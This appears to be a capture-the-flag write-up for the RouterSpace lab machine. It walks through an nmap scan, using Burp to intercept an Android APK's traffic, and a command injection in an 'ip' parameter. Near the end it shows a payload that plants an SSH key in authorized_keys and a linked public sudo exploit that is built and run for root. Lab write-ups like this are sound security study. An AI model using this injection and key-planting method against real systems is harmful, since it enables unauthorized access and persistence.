As always we start with nmap to discover open ports
Nmap Scan
nmap -sC -sV -oA routerSpace 10.10.11.148
Nmap scan report for 10.10.11.148
Host is up (0.15s latency).
Not shown: 998 filtered ports
PORT STATE SERVICE VERSION
22/tcp open ssh (protocol 2.0)
| fingerprint-strings:
| NULL:
|_ SSH-2.0-RouterSpace Packet Filtering V1
| ssh-hostkey:
| 3072 f4:e4:c8:0a:a6:af:66:93:af:69:5a:a9:bc:75:f9:0c (RSA)
| 256 7f:05:cd:8c:42:7b:a9:4a:b2:e6:35:2c:c4:59:78:02 (ECDSA)
|_ 256 2f:d7:a8:8b:be:2d:10:b0:c9:b4:29:52:a8:94:24:78 (ED25519)
80/tcp open http
| fingerprint-strings:
| FourOhFourRequest:
| HTTP/1.1 200 OK
| X-Powered-By: RouterSpace
| X-Cdn: RouterSpace-90752
| Content-Type: text/html; charset=utf-8
| Content-Length: 83
| ETag: W/"53-1CPF2lTAVDqjw0ulBsW5R961pkE"
| Date: Wed, 06 Jul 2022 19:33:03 GMT
| Connection: close
| Suspicious activity detected !!! {RequestID: gDdeM 7Oi rA q Q dB 1qhNmgI }
| GetRequest:
| HTTP/1.1 200 OK
| X-Powered-By: RouterSpace
| X-Cdn: RouterSpace-15939
| Accept-Ranges: bytes
| Cache-Control: public, max-age=0
| Last-Modified: Mon, 22 Nov 2021 11:33:57 GMT
| ETag: W/"652c-17d476c9285"
| Content-Type: text/html; charset=UTF-8
| Content-Length: 25900
| Date: Wed, 06 Jul 2022 19:33:01 GMT
| Connection: close
| <!doctype html>
| <html class="no-js" lang="zxx">
| <head>
| <meta charset="utf-8">
| <meta http-equiv="x-ua-compatible" content="ie=edge">
| <title>RouterSpace</title>
| <meta name="description" content="">
| <meta name="viewport" content="width=device-width, initial-scale=1">
| <link rel="stylesheet" href="css/bootstrap.min.css">
| <link rel="stylesheet" href="css/owl.carousel.min.css">
| <link rel="stylesheet" href="css/magnific-popup.css">
| <link rel="stylesheet" href="css/font-awesome.min.css">
| <link rel="stylesheet" href="css/themify-icons.css">
| HTTPOptions:
| HTTP/1.1 200 OK
| X-Powered-By: RouterSpace
| X-Cdn: RouterSpace-33000
| Allow: GET,HEAD,POST
| Content-Type: text/html; charset=utf-8
| Content-Length: 13
| ETag: W/"d-bMedpZYGrVt1nR4x+qdNZ2GqyRo"
| Date: Wed, 06 Jul 2022 19:33:02 GMT
| Connection: close
| GET,HEAD,POST
| RTSPRequest, X11Probe:
| HTTP/1.1 400 Bad Request
|_ Connection: close
|_http-title: RouterSpace
We have two open ports, ssh on 22 and http on 80, and their versions have no serious vulnerabilities. Nothing to do with SSH for now, so lets enumerate port 80.
HTTP Enumeration
Going to http://10.10.11.148/ we see a static html page, but there is a download button that downloads an APK file.
Now we need to know what this app is doing so we lets install it on an android enumator and configure burpsuite so it listen on all interfaces to intercept the traffic from the emulator. We can use any android emulator you like, i will use genymotion for this one.
First, we will configure burp to listen on all interfaces on port 8081.
Next, we need to configure proxy setting from Settings -> Wi-Fi -> Modify Network -> Proxy on the emulator.
Last step is to drag and drop the APK file to the emulator to install it.
The application has only “Check Status” button, when we click it and navigate to HTTP history tab in burpsuite we see a POST request to http://routerspace.htb with no response (because our machine doesn’t know how to resolve routerspace.htb).
So lets add this hostname to the hosts file and click “Check Status” button.
Now we see a response.
Lets send this request to the repeater to play with.
Initial Foothold / User
The first thing came to my mind is that maybe the machine executes system command on the ip parameter like ping -c1 <ip> to check whether the specified ip is up or not, so I tried injecting whoami in the ip parameter.
It works and I am can execute commands as user paul.
I have tried to get a reverse shell in various ways but failed, so I just put my ssh public key in authorized_keys file and SSHed into the machine with user paul.
Payload: ;echo ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDVd5Cr7JucC1oFvizD2p9lBPCGuWR7H7COIYtZnrwLJomv1jvt5P26ayTOrB44HkaPsFJlBX0r+IsUdfbg0C0THEWXK2YYuik5drXUapmyhoh+o/2+u/KPtdq6+XjaUQ712mXXK1pSC7QpHjTcyVjyvr0zjAUW+MZwo0uUsLaDa/wsoWoFDoJ0iZqtMw/uz9WtOywKMu425eRs5C2us1AebpAMn7FO3tDLPLgSv4z6XUfYDR7VtBCZNKiX6ob2VfEnKSNhPiMiGzWEnrEZec6Gb4jpcMsxazmHzN5lcRBvILaacRgYyIJom5aWI7F9YX5e+IIBj03f+VbMU4hgbZw7 > ~/.ssh/authorized_keys;
Getting Root
I ran linpeas.sh and quickly found that the sudo version may be vulnerable.
So I searched for public exploits for this version and found this repository.
https://github.com/mohinparamasivam/Sudo-1.8.31-Root-Exploit
I cloned this repo and couldn’t transfer the files to the machine so I copied and pasted the three files (exploit.c, shellcode.c, Makefile).
Finally, run make
then ./exploit
and we are root on the box!